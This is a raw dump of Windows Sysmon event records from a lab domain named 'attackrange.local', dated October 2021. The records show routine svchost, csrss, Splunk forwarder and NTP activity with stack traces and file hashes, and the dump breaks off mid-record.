08:02:34.462{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083569Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:34.462{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083568Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:34.462{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083567Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:34.462{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083566Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:34.462{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B51A-615A-9901-00000000FD01}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083565Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:34.462{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B51A-615A-9901-00000000FD01}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083564Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:34.463{2FDD8D40-B51A-615A-9901-00000000FD01}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083563Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:34.446{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADE40D6A9F5392E47960E9DD687D5FE6,SHA256=5A367DC997F30FCC7CB5D9484609F0AB1DCE8C1165FB412A239842E5A74FF3E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083562Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:34.024{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D7AC8D8A094AE936E421F8BCBFBC77F,SHA256=9E04B924A1B9AC40ED027EAB3C1A334F58BB98C2CABE9321E13767A8C8348EF2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083595Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:35.665{2FDD8D40-B51B-615A-9A01-00000000FD01}2284984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083594Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:35.524{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B51B-615A-9A01-00000000FD01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083593Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:35.524{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083592Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:35.524{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083591Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:35.524{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083590Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:35.524{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083589Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:35.524{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083588Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:35.524{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083587Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:35.524{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083586Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:35.524{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083585Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:35.524{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083584Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:35.524{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B51B-615A-9A01-00000000FD01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083583Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:35.524{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B51B-615A-9A01-00000000FD01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083582Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:35.525{2FDD8D40-B51B-615A-9A01-00000000FD01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083581Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:35.493{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=875F9D87908735EEC857871A6DEBD27D,SHA256=392F855C22E410C0EFE5D40638A2E04B49D9F02F89E863110349C9E2E8792E1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083580Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:35.446{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E6FC1A380B1F554FE1DF17F49774DE0,SHA256=20845250B4F286B28FD5B6C8FCFA53EB36C09631AFB79FD26DD3DB25D716FD5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107686Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:35.290{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C8081B0A5E00CE8908DA45EF264D4A8,SHA256=35AD160372E1CA065691B8A1C784BB3980D20B799D552D114DBE91C2FE8CDB75,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083613Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:34.391{2FDD8D40-AC9A-615A-1000-00000000FD01}960C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-36.attackrange.local123ntpfalse20.101.57.9-123ntp 354300x800000000000000083612Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:34.391{2FDD8D40-AC9A-615A-1000-00000000FD01}960C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-36.attackrange.local123ntpfalse10.0.1.14-123ntp 10341000x800000000000000083611Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:36.748{2FDD8D40-B51C-615A-9B01-00000000FD01}37922328C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000083610Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:36.529{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=61BFFC38664B03CD5CFFF9D68CC1774E,SHA256=9BF91A31AD4A48FB9DF999FCA9A0162DF6D3FDD208EF0F5A66CCE4049FE59AC3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083609Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:36.529{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B51C-615A-9B01-00000000FD01}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083608Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 